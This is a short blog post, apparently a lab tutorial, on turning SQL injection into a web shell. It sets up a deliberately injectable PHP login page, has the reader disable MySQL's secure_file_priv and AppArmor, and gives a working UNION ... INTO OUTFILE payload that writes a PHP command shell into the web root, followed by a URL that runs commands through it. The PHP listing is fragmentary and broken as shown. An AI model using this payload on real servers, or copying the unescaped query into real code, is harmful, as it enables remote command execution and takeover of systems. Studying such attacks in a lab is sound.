Saturday, July 8, 2017

shell from sql injection

1- create login database,
create database login;
use login;
CREATE TABLE `login` ( `id` INT NOT NULL AUTO_INCREMENT, `user`  varchar(100) NOT NULL, `password`  varchar(100) NOT NULL,PRIMARY KEY (`id`));

insert into login(user,password) values('user1','pass1');
insert into login(user,password) values('user2','pass2');

$ mysql -u root -p < user.sql

2- setup your web test directory in /var/www/html/test
***index.php ***


define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'me');
define('DB_DATABASE', 'login');

$show = true;
if ($action=="")    /* display the contact form */
        if ($_POST){
            $user = $_POST['user'];
            $pass = $_POST['pass'];
        // $user = mysqli_real_escape_string($db,$_POST['user']);

         $sql = "SELECT id FROM login WHERE user = '$user' and password = '$pass'";
          //file_put_contents('php://stderr', print_r($sql, TRUE));
             $result = mysqli_query($db,$sql);
              $row = mysqli_fetch_array($result,MYSQLI_ASSOC);
        $count = mysqli_num_rows($result);

            if ($count == 1){

            $_SESSION['login_user'] = $user;
                $msg = "<br>login successful <br>";
                $show = false;
                $msg = "wrong password <br>";

<title>Login form</title>
        if ($show == false){
            echo '<a href="."> logout! </a>';
            echo $msg;
            echo '<form method="post" action="index.php">';
            echo 'Username:<input type="text" size="100" maxlength="120" name="user"><br />';
            echo 'Password:<input type="password" size="100" maxlength="360" name="pass"><br />';
            echo $msg;
            echo '<input type="submit" name="login" value="Login">';
            echo '</form>';

3- disable secure_file_priv from mysql add line below to the file /etc/mysql/my.cnf

if your sql disable message below, you have to create output to that directory and you are not able to execute it later
mysql> SHOW VARIABLES LIKE "secure_file_priv";
| Variable_name    | Value                 |
| secure_file_priv | /var/lib/mysql-files/ |
1 row in set (0.00 sec)

4- disable apparmor,
$ sudo /etc/init.d/apparmor stop
$ sudo /etc/init.d/apparmor teardown

5- create shell from sql injection in user input box
user10' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/test/out.php';#

6- now to ls root directory use the following url
http://serverip/test/out.php?cmd=ls /

No comments:

Post a Comment